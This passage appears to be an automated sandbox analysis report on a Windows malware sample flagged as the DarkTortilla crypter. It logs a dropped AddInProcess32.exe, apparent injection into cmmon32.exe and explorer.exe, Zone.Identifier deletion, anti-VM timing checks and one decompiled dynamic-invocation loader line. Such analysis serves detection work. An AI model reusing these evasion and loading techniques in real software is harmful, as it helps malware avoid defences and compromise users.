          Source: C:\Windows\explorer.exeSection loaded: cscobj.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: srchadmin.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.storage.search.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: synccenter.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: imapi2.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ieproxy.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: bluetoothapis.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: bluetoothapis.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: settingsync.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: settingsynccore.dllJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: VFylJFPzqX.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: VFylJFPzqX.exeStatic file information: File size 1085440 > 1048576
          Source: VFylJFPzqX.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: AddInProcess32.pdb source: AddInProcess32.exe, 00000003.00000000.1427689911.0000000000CC2000.00000002.00000001.01000000.0000000C.sdmp, explorer.exe, 00000004.00000002.2373426103.00000000106CF000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.2664288495.0000000002678000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.2669741591.000000000489F000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 00000010.00000002.2679117867.000000000A6FF000.00000004.80000000.00040000.00000000.sdmp, AddInProcess32.exe.0.dr
          Source: Binary string: cmmon32.pdb source: AddInProcess32.exe, 00000003.00000002.1519369707.0000000001338000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000003.00000002.1519293726.00000000012C0000.00000040.10000000.00040000.00000000.sdmp, cmmon32.exe, cmmon32.exe, 00000005.00000002.2660330893.00000000001F0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: cmmon32.pdbGCTL source: AddInProcess32.exe, 00000003.00000002.1519369707.0000000001338000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000003.00000002.1519293726.00000000012C0000.00000040.10000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.2660330893.00000000001F0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.2668080386.0000000004350000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.2668080386.00000000044EE000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.1519005091.0000000003FFE000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.1520648011.00000000041A0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: AddInProcess32.exe, AddInProcess32.exe, 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, cmmon32.exe, 00000005.00000002.2668080386.0000000004350000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.2668080386.00000000044EE000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.1519005091.0000000003FFE000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.1520648011.00000000041A0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: AddInProcess32.pdbpw source: AddInProcess32.exe, 00000003.00000000.1427689911.0000000000CC2000.00000002.00000001.01000000.0000000C.sdmp, explorer.exe, 00000004.00000002.2373426103.00000000106CF000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.2664288495.0000000002678000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.2669741591.000000000489F000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 00000010.00000002.2679117867.000000000A6FF000.00000004.80000000.00040000.00000000.sdmp, AddInProcess32.exe.0.dr

          Data Obfuscation

          barindex
          Yara detected DarkTortilla Crypter
          Source: Yara matchFile source: 0.2.VFylJFPzqX.exe.35a2f70.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.VFylJFPzqX.exe.55f0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.VFylJFPzqX.exe.35a2f70.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.VFylJFPzqX.exe.55f0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.1486863721.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1471351039.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1485081729.0000000003571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: VFylJFPzqX.exe PID: 7764, type: MEMORYSTR
          .NET source code contains method to dynamically call methods (often used by packers)
          Source: VFylJFPzqX.exe, Ss9.cs.Net Code: NewLateBinding.LateCall(NewLateBinding.LateGet(NewLateBinding.LateGet(Ck08, (Type)null, "GetTypes", new object[1] { 24 }, (string[])null, (Type[])null, (bool[])null), (Type)null, "GetMethod", new object[1] { k5M7.Substring(3, 7) }, (string[])null, (Type[])null, (bool[])null), (Type)null, "Invoke", new object[2]{null,new object[0]}, (string[])null, (Type[])null, (bool[])null, true)
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E759E5 push esp; retf 0_2_05E759E6
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E75970 push eax; retf 0_2_05E75971
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_05E75B51 pushad ; retf 0_2_05E75B52
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeCode function: 0_2_073C5E20 push edx; iretd 0_2_073C5E21
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0041D4D2 push eax; ret 3_2_0041D4D8
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0041D4DB push eax; ret 3_2_0041D542
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0041D485 push eax; ret 3_2_0041D4D8
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0041D53C push eax; ret 3_2_0041D542
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0179225F pushad ; ret 3_2_017927F9
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017927FA pushad ; ret 3_2_017927F9
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_017C09AD push ecx; mov dword ptr [esp], ecx3_2_017C09B6
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_0179283D push eax; iretd 3_2_01792858
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_01791368 push eax; iretd 3_2_01791369
          Source: C:\Windows\explorer.exeCode function: 4_2_104269B5 push esp; retn 0000h4_2_10426AE7
          Source: C:\Windows\explorer.exeCode function: 4_2_10426B02 push esp; retn 0000h4_2_10426B03
          Source: C:\Windows\explorer.exeCode function: 4_2_10426B1E push esp; retn 0000h4_2_10426B1F
          Source: C:\Windows\explorer.exeCode function: 4_2_10F789B5 push esp; retn 0000h4_2_10F78AE7
          Source: C:\Windows\explorer.exeCode function: 4_2_10F78B1E push esp; retn 0000h4_2_10F78B1F
          Source: C:\Windows\explorer.exeCode function: 4_2_10F78B02 push esp; retn 0000h4_2_10F78B03
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_001F74CD push ecx; ret 5_2_001F74E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043527FA pushad ; ret 5_2_043527F9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0435225F pushad ; ret 5_2_043527F9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0435283D push eax; iretd 5_2_04352858
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_043809AD push ecx; mov dword ptr [esp], ecx5_2_043809B6
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_024AD4DB push eax; ret 5_2_024AD542
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_024AD4D2 push eax; ret 5_2_024AD4D8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_024AD485 push eax; ret 5_2_024AD4D8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_024AD53C push eax; ret 5_2_024AD542
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_024ADC8C push ss; retf 5_2_024ADC8D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_041FE9B5 push esp; retn 0000h5_2_041FEAE7
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_041FEB1E push esp; retn 0000h5_2_041FEB1F
          Source: VFylJFPzqX.exeStatic PE information: section name: .text entropy: 6.889045730769205
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeFile created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Hides that the sample has been downloaded from the Internet (zone.identifier)
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeFile opened: C:\Users\user\Desktop\VFylJFPzqX.exe\:Zone.Identifier read attributes | deleteJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Yara detected AntiVM3
          Source: Yara matchFile source: Process Memory Space: VFylJFPzqX.exe PID: 7764, type: MEMORYSTR
          Query firmware table information (likely to detect VMs)
          Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformation
          Switches to a custom stack to bypass stack traces
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD324
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0774
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0154
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD8A4
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeAPI/Special instruction interceptor: Address: 7FFBCB7ADA44
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD1E4
          Source: C:\Windows\SysWOW64\cmmon32.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD324
          Source: C:\Windows\SysWOW64\cmmon32.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0774
          Source: C:\Windows\SysWOW64\cmmon32.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD944
          Source: C:\Windows\SysWOW64\cmmon32.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD504
          Source: C:\Windows\SysWOW64\cmmon32.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD544
          Source: C:\Windows\SysWOW64\cmmon32.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD1E4
          Source: C:\Windows\SysWOW64\cmmon32.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0154
          Source: C:\Windows\SysWOW64\cmmon32.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD8A4
          Source: C:\Windows\SysWOW64\cmmon32.exeAPI/Special instruction interceptor: Address: 7FFBCB7ADA44
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeRDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 2499904 second address: 249990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 2499B7E second address: 2499B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeMemory allocated: C30000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeMemory allocated: 2570000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeMemory allocated: 23F0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeMemory allocated: 7C70000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeMemory allocated: 8C70000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeMemory allocated: 8E40000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeMemory allocated: 9E40000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeMemory allocated: A220000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeMemory allocated: B220000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeMemory allocated: C220000 memory reserve | memory write watchJump to behavior
          Source: C:\Windows\explorer.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 3_2_00409AB0 rdtsc 3_2_00409AB0
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1769Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 8165Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 877Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 873Jump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeWindow / User API: threadDelayed 9828Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 432
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 424
          Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeAPI coverage: 1.7 %
          Source: C:\Windows\SysWOW64\cmmon32.exeAPI coverage: 1.8 %
          Source: C:\Users\user\Desktop\VFylJFPzqX.exe TID: 7916Thread sleep time: -1844674407370954s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exe TID: 7784Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 1296Thread sleep count: 1769 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 1296Thread sleep time: -3538000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 1296Thread sleep count: 8165 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 1296Thread sleep time: -16330000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exe TID: 7264Thread sleep count: 142 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exe TID: 7264Thread sleep time: -284000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exe TID: 7264Thread sleep count: 9828 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exe TID: 7264Thread sleep time: -19656000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
